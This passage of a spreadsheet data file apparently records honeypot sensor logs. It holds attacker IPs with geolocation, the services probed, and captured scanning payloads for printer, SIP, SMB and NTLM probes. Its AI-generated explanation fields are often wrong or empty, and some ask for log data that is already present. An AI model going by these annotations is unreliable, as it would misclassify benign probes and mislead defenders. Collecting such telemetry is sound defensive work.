mstshash=HNBsEP'}}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}</t>
  </si>
  <si>
    <t>::ffff:93b9:8457</t>
  </si>
  <si>
    <t>The server is unable to synchronize its clock due to an unknown issue with the NTP (Network Time Protocol) service, potentially indicating a network problem or service disruption. This could be a sign of underlying issues rather than malicious activity itself but warrants further investigation as it may have been exploited by attackers for their own purposes. &amp;&amp; No data received for FTP service, indicating possible lack of interaction or malicious activity attempting to evade detection. This could be an attempt to gather information about the system without initiating a connection. It may also indicate a sophisticated attacker trying to remain undetected. &amp;&amp; The log indicates an attempt to connect or interact with an IMAP service without any specified action or error, suggesting potential reconnaissance or probing activity. The lack of specific information may indicate the attacker is testing for vulnerabilities or checking if the service is online. This could be a precursor to more malicious activities. &amp;&amp; Malicious actor is attempting to access Redis service, possibly to steal data or gain unauthorized control. The actor's intentions are unclear as no credentials were provided. This may be a reconnaissance attempt to identify available services on the network. &amp;&amp; Malicious actor attempting to identify capabilities of targeted service, possibly preparing for exploitation or unauthorized access. 
This is a reconnaissance phase to understand the service's features and limitations. 
The actor may be mapping out potential entry points for future attacks.</t>
  </si>
  <si>
    <t>IMAP Attack &amp;&amp; Scanning Probe</t>
  </si>
  <si>
    <t>0122260f49fb07e7b14d2bc2ef119391</t>
  </si>
  <si>
    <t>61.3.21.9</t>
  </si>
  <si>
    <t>{'b.barracudacentral.org': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}</t>
  </si>
  <si>
    <t>::ffff:3d03:1509</t>
  </si>
  <si>
    <t>9b0ba5d795c8da77b3ff3e43c31c9d67</t>
  </si>
  <si>
    <t>103.164.180.106</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>1433&amp;&amp;51653&amp;&amp;51692</t>
  </si>
  <si>
    <t>JI</t>
  </si>
  <si>
    <t>East Java</t>
  </si>
  <si>
    <t>Kabupaten Bangkalan</t>
  </si>
  <si>
    <t>Bangkalan</t>
  </si>
  <si>
    <t>1650298</t>
  </si>
  <si>
    <t>-7.04754</t>
  </si>
  <si>
    <t>112.736</t>
  </si>
  <si>
    <t>141911</t>
  </si>
  <si>
    <t>Dinas Komunikasi dan Informatika Kabupaten Bangkalan</t>
  </si>
  <si>
    <t>2021-03-23</t>
  </si>
  <si>
    <t>IDNIC-DISKOMINFO-BANGKALAN-ID</t>
  </si>
  <si>
    <t>::ffff:67a4:b46a</t>
  </si>
  <si>
    <t>7ce55f39d6268a34d77a3376a7f6f985</t>
  </si>
  <si>
    <t>222.166.250.21</t>
  </si>
  <si>
    <t>NA&amp;&amp;cm222-166-250-21.hkcable.com.hk</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>NTW</t>
  </si>
  <si>
    <t>Tsuen Wan</t>
  </si>
  <si>
    <t>Chai Wan Kok</t>
  </si>
  <si>
    <t>1820001</t>
  </si>
  <si>
    <t>22.3728</t>
  </si>
  <si>
    <t>9908</t>
  </si>
  <si>
    <t>Hong Kong Cable Television Limited</t>
  </si>
  <si>
    <t>Hong Kong Cable TV Ltd - Cable Multi-Media Services</t>
  </si>
  <si>
    <t>2004-04-21</t>
  </si>
  <si>
    <t>HKCABLE-HK</t>
  </si>
  <si>
    <t>::ffff:dea6:fa15</t>
  </si>
  <si>
    <t>b87d179693e6a3b223cba25b139b4e9e</t>
  </si>
  <si>
    <t>77.81.66.200</t>
  </si>
  <si>
    <t>RO</t>
  </si>
  <si>
    <t>Romania</t>
  </si>
  <si>
    <t>B</t>
  </si>
  <si>
    <t>București</t>
  </si>
  <si>
    <t>Municipiul Bucureşti</t>
  </si>
  <si>
    <t>Bucharest</t>
  </si>
  <si>
    <t>683506</t>
  </si>
  <si>
    <t>44.4268</t>
  </si>
  <si>
    <t>26.1025</t>
  </si>
  <si>
    <t>41496</t>
  </si>
  <si>
    <t>TV SAT 2002 SRL</t>
  </si>
  <si>
    <t>TVSAT Fiber</t>
  </si>
  <si>
    <t>2007-02-15</t>
  </si>
  <si>
    <t>::ffff:4d51:42c8</t>
  </si>
  <si>
    <t>d76233bc18b89f01629044fba8af9eca</t>
  </si>
  <si>
    <t>196.189.97.114</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_SSH_H15&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;abuse.ch&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_SSH_H12&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_TELNET_H12</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;34178&amp;&amp;NA&amp;&amp;37633&amp;&amp;22&amp;&amp;54526</t>
  </si>
  <si>
    <t>ET</t>
  </si>
  <si>
    <t>Ethiopia</t>
  </si>
  <si>
    <t>AA</t>
  </si>
  <si>
    <t>Addis Ababa</t>
  </si>
  <si>
    <t>Arada</t>
  </si>
  <si>
    <t>344979</t>
  </si>
  <si>
    <t>9.02427</t>
  </si>
  <si>
    <t>38.7519</t>
  </si>
  <si>
    <t>24757</t>
  </si>
  <si>
    <t>EthioNet</t>
  </si>
  <si>
    <t>Ethiotelecom</t>
  </si>
  <si>
    <t>IP Pool for IPOE AD</t>
  </si>
  <si>
    <t>::ffff:c4bd:6172</t>
  </si>
  <si>
    <t>None&amp;&amp;C-I_D&amp;&amp;C-U</t>
  </si>
  <si>
    <t>No activity detected via TELNET service. 
TELNET is being monitored but no malicious activity found so far. 
Normal operation of the service observed.</t>
  </si>
  <si>
    <t>I'd need some log data to analyze, but I can provide you with common types of attacks that might be seen:
* SQL Injection
* Brute Force
* Scan Attempt
* Port Probe
* DoS Attack
* Cross Site
* Phishing Attempt</t>
  </si>
  <si>
    <t>d3d657846c554584875c9463d3a2e815</t>
  </si>
  <si>
    <t>103.61.240.174</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26</t>
  </si>
  <si>
    <t>BD</t>
  </si>
  <si>
    <t>Bangladesh</t>
  </si>
  <si>
    <t>C</t>
  </si>
  <si>
    <t>Dhaka Division</t>
  </si>
  <si>
    <t>Dhaka</t>
  </si>
  <si>
    <t>Bhātāra</t>
  </si>
  <si>
    <t>1209106</t>
  </si>
  <si>
    <t>23.8</t>
  </si>
  <si>
    <t>90.45</t>
  </si>
  <si>
    <t>138640</t>
  </si>
  <si>
    <t>HelloTech Limited</t>
  </si>
  <si>
    <t>Hello Tech Limited</t>
  </si>
  <si>
    <t>::ffff:673d:f0ae</t>
  </si>
  <si>
    <t>No malicious activity detected, log data is empty. &amp;&amp; No log data provided, so there's nothing to analyze or explain.</t>
  </si>
  <si>
    <t>Port Scan &amp;&amp; I need log data to analyze and provide you with the type of attacks detected. Please provide the log data, and I'll be happy to help.</t>
  </si>
  <si>
    <t>defc2c5895a74e6860dccc5677ea2f15</t>
  </si>
  <si>
    <t>154.212.141.163</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SIP_H45&amp;&amp;NA&amp;&amp;SMA-LAB_IMAP_H37&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_IMAP_H15&amp;&amp;SMA-LAB_SMTP_H6&amp;&amp;SMA-LAB_PJL_H30&amp;&amp;SMA-LAB_FTP_H34&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_SMTP_H23&amp;&amp;SMA-LAB_IMAP_H22&amp;&amp;SMA-LAB_SMTP_H47&amp;&amp;SMA-LAB_POSTGRES_H10&amp;&amp;SMA-LAB_MSSQL_H39&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_PJL_H40&amp;&amp;SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_MYSQL_H15&amp;&amp;SMA-LAB_TELNET_H30</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;NA&amp;&amp;143&amp;&amp;23&amp;&amp;25&amp;&amp;9100&amp;&amp;21&amp;&amp;1433&amp;&amp;5432&amp;&amp;3306&amp;&amp;443&amp;&amp;445&amp;&amp;80&amp;&amp;110&amp;&amp;3389</t>
  </si>
  <si>
    <t>connection&amp;&amp;query&amp;&amp;request&amp;&amp;GET&amp;&amp;command&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 185.255.123.181:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.163;rport=52650'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '154.93.37.45:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.163,40696)}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.163,54990)}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '154.93.37.45:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.163,45154)}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '66.94.127.183:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'User-Agent': 'NTRIP GNSSInternetRadio', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '38.54.117.64:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.163;rport=53261'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '38.54.116.162:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=', 'Host': '38.54.116.162:443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'HELP', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.163,46358)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WRcPbNWP,)}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 94.131.97.67:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}</t>
  </si>
  <si>
    <t>::ffff:9ad4:8da3</t>
  </si>
  <si>
    <t>Unknown user attempted to connect to POP3 service, indicating potential malicious login attempt to intercept or steal email credentials. 
The lack of authentication details suggests the activity may be reconnaissance or probing.
This could be an initial step in a larger attack or spamming campaign. &amp;&amp; No activity detected. 
Empty log entry suggests that there was either no traffic or no malicious activity reported to the system.
This could be due to the honeypot being newly deployed or not yet actively receiving connections. &amp;&amp; This log indicates a GET request from an unknown source with a suspicious User-Agent header, possibly indicating a scan or reconnaissance attempt. 
The '*' in the Accept field is likely used to bypass filters or restrictions. 
This activity may be part of a larger attack or information gathering effort. &amp;&amp; No log data provided, therefore I have nothing to analyze or explain.</t>
  </si>
  <si>
    <t>I'd be happy to help analyze the log data! However, I notice that there is no log data provided. Could you please provide the actual log data so I can assist you with identifying the type of attack? &amp;&amp; Port Scan &amp;&amp; Scanning Attempt</t>
  </si>
  <si>
    <t>03096f94fe44718581c0812e5634e684</t>
  </si>
  <si>
    <t>161.132.55.181</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_H28&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H43&amp;&amp;SMA-LAB_MSSQL_H46</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;1433&amp;&amp;445&amp;&amp;NA&amp;&amp;55498&amp;&amp;55745</t>
  </si>
  <si>
    <t>PE</t>
  </si>
  <si>
    <t>Peru</t>
  </si>
  <si>
    <t>LMA</t>
  </si>
  <si>
    <t>Lima Province</t>
  </si>
  <si>
    <t>Lima</t>
  </si>
  <si>
    <t>3936456</t>
  </si>
  <si>
    <t>15001</t>
  </si>
  <si>
    <t>-12.1153</t>
  </si>
  <si>
    <t>-77.0232</t>
  </si>
  <si>
    <t>3132</t>
  </si>
  <si>
    <t>Red Cientifica Peruana</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (161.132.55.181,25430)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (161.132.55.181,25596)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (161.132.55.181,4657)}&amp;&amp;{Data_SMB:Incoming connection (161.132.55.181,24334)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (161.132.55.181,24463)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (161.132.55.181,34265)}&amp;&amp;{Data_SMB:Incoming connection (161.132.55.181,23449)}&amp;&amp;{Data_SMB:Incoming connection (161.132.55.181,23522)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (161.132.55.181,39641)}&amp;&amp;{Data_SMB:Incoming connection (161.132.55.181,39689)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (161.132.55.181,39132)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (161.132.55.181,39213)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (161.132.55.181,24936)}&amp;&amp;{Data_SMB:Incoming connection (161.132.55.181,55460)}&amp;&amp;{Data_SMB:Incoming connection (161.132.55.181,24156)}&amp;&amp;{Data_SMB:Incoming connection (161.132.55.181,24218)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}</t>
  </si>
  <si>
    <t>::ffff:a184:37b5</t>
  </si>
  <si>
    <t>No log data provided, unable to analyze.</t>
  </si>
  <si>
    <t>deb8162dbef1dad8dbf6d0ac5d80b71e</t>
  </si>
  <si>
    <t>64.62.197.47</t>
  </si>
  <si>
    <t>scan-45a.shadowserver.org&amp;&amp;NA</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_IPP_H38&amp;&amp;SMA-LAB_IPP_H5&amp;&amp;SMA-LAB_LDAP_H23&amp;&amp;SMA-LAB_SSH_H15&amp;&amp;SMA-LAB_LDAP_H45&amp;&amp;SMA-LAB_IPP_H15&amp;&amp;SMA-LAB_REDIS_H12&amp;&amp;SMA-LAB_IPP_H12&amp;&amp;SMA-LAB_SMTP_H26&amp;&amp;SMA-LAB_IPP_H23&amp;&amp;SMA-LAB_REDIS_H45&amp;&amp;SMA-LAB_HTTPS_H4&amp;&amp;SMA-LAB_LDAP_H15&amp;&amp;SMA-LAB_IMAP_H27&amp;&amp;SMA-LAB_MYSQL_H22&amp;&amp;SMA-LAB_IPP_H24&amp;&amp;SMA-LAB_IPP_H18&amp;&amp;SMA-LAB_REDIS_H8&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_IPP_H21&amp;&amp;SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_ORACLE_H9&amp;&amp;SMA-LAB_IMAP_H14&amp;&amp;SMA-LAB_REDIS_H16&amp;&amp;SMA-LAB_REDIS_H27&amp;&amp;SMA-LAB_IPP_H4&amp;&amp;SMA-LAB_HTTPS_H44&amp;&amp;SMA-LAB_LDAP_H27&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_IPP_H8&amp;&amp;SMA-LAB_REDIS_H29&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_IMAP_H33&amp;&amp;SMA-LAB_LDAP_H47&amp;&amp;SMA-LAB_IPP_H40&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_RDP_H27&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_POSTGRES_H38&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_LDAP_H36&amp;&amp;SMA-LAB_LDAP_H6&amp;&amp;SMA-LAB_RDP_H39&amp;&amp;SMA-LAB_SNMP_H33&amp;&amp;SMA-LAB_SNMP_H23&amp;&amp;SMA-LAB_LDAP_H26&amp;&amp;SMA-LAB_IMAP_H34&amp;&amp;SMA-LAB_REDIS_H17&amp;&amp;SMA-LAB_IMAP_H38&amp;&amp;SMA-LAB_SOCKS5_H39&amp;&amp;SMA-LAB_REDIS_H34&amp;&amp;SMA-LAB_MYSQL_H5&amp;&amp;SMA-LAB_IPP_H27&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_POSTGRES_H6&amp;&amp;SMA-LAB_IPP_H33&amp;&amp;SMA-LAB_PJL_H4&amp;&amp;SMA-LAB_REDIS_H31&amp;&amp;SMA-LAB_LDAP_H9&amp;&amp;SMA-LAB_POSTGRES_H22&amp;&amp;SMA-LAB_HTTPS_H11&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_HTTPS_H16&amp;&amp;SMA-LAB_LDAP_H22&amp;&amp;SMA-LAB_SOCKS5_H24&amp;&amp;SMA-LAB_LDAP_H37&amp;&amp;SMA-LAB_REDIS_H21&amp;&amp;SMA-LAB_RDP_H38&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_SMTP_H35&amp;&amp;SMA-LAB_REDIS_H15&amp;&amp;SMA-LAB_REDIS_H35&amp;&amp;SMA-LAB_IPP_H37&amp;&amp;SMA-LAB_HTTPS_H38&amp;&amp;SMA-LAB_IPP_H26&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_MYSQL_H23&amp;&amp;SMA-LAB_SMTP_H36&amp;&amp;SMA-LAB_VNC_H28&amp;&amp;SMA-LAB_ORACLE_H16&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_PJL_H44&amp;&amp;SMA-LAB_REDIS_H14&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_RDP_H33&amp;&amp;SMA-LAB_ORACLE_H22&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_POP3_H35&amp;&amp;SMA-LAB_IPP_H46&amp;&amp;SMA-LAB_SNMP_H37&amp;&amp;SMA-LAB_PJL_H23&amp;&amp;SMA-LAB_FTP_H38&amp;&amp;SMA-LAB_IPP_H22&amp;&amp;SMA-LAB_REDIS_H46&amp;&amp;SMA-LAB_IPP_H17&amp;&amp;SMA-LAB_REDIS_H37&amp;&amp;SMA-LAB_IPP_H29&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_IPP_H41&amp;&amp;SMA-LAB_POP3_H33&amp;&amp;SMA-LAB_POSTGRES_H46&amp;&amp;SMA-LAB_IPP_H16&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_LDAP_H33&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_REDIS_H28&amp;&amp;SMA-LAB_HTTPS_H45&amp;&amp;SMA-LAB_SOCKS5_H28&amp;&amp;SMA-LAB_REDIS_H32&amp;&amp;SMA-LAB_RDP_H34&amp;&amp;SMA-LAB_REDIS_H18&amp;&amp;SMA-LAB_PJL_H30&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_LDAP_H17&amp;&amp;SMA-LAB_LDAP_H21&amp;&amp;SMA-LAB_PJL_H12&amp;&amp;SMA-LAB_LDAP_H35&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_REDIS_H6&amp;&amp;SMA-LAB_IPP_H47&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_PJL_H27&amp;&amp;SMA-LAB_PJL_H15&amp;&amp;SMA-LAB_PJL_H16&amp;&amp;SMA-LAB_LDAP_H31&amp;&amp;SMA-LAB_HTTPS_H34&amp;&amp;SMA-LAB_RDP_H9&amp;&amp;SMA-LAB_ORACLE_H36&amp;&amp;SMA-LAB_REDIS_H22&amp;&amp;SMA-LAB_ORACLE_H47&amp;&amp;SMA-LAB_HTTPS_H19&amp;&amp;SMA-LAB_REDIS_H47&amp;&amp;SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_LDAP_H10&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_IPP_H32&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_MYSQL_H15</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;631&amp;&amp;389&amp;&amp;22&amp;&amp;6379&amp;&amp;25&amp;&amp;443&amp;&amp;143&amp;&amp;3306&amp;&amp;23&amp;&amp;1521&amp;&amp;80&amp;&amp;5900&amp;&amp;3389&amp;&amp;37290&amp;&amp;5432&amp;&amp;161&amp;&amp;1080&amp;&amp;9100&amp;&amp;445&amp;&amp;110&amp;&amp;8443&amp;&amp;21&amp;&amp;NA&amp;&amp;4170</t>
  </si>
  <si>
    <t>Alameda</t>
  </si>
  <si>
    <t>Fremont (East Industrial)</t>
  </si>
  <si>
    <t>5350734</t>
  </si>
  <si>
    <t>94539</t>
  </si>
  <si>
    <t>37.49</t>
  </si>
  <si>
    <t>-121.931</t>
  </si>
  <si>
    <t>6939</t>
  </si>
  <si>
    <t>Hurricane Electric LLC</t>
  </si>
  <si>
    <t>Hurricane Electric</t>
  </si>
  <si>
    <t>connection&amp;&amp;query&amp;&amp;command&amp;&amp;GET&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '156.244.8.69:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:102.0) Gecko/20100101 Goanna/6.6 Firefox/102.0 PaleMoon/33.0.0', 'method': 'GET', 'uri': '/owa/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '144', 'Content-Type': 'application/ipp', 'Host': '94.131.8.76:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://94.131.8.76:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '148', 'Content-Type': 'application/ipp', 'Host': '185.255.123.181:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://185.255.123.181:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '95.164.118.29:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://95.164.118.29:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '5.181.21.224:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language 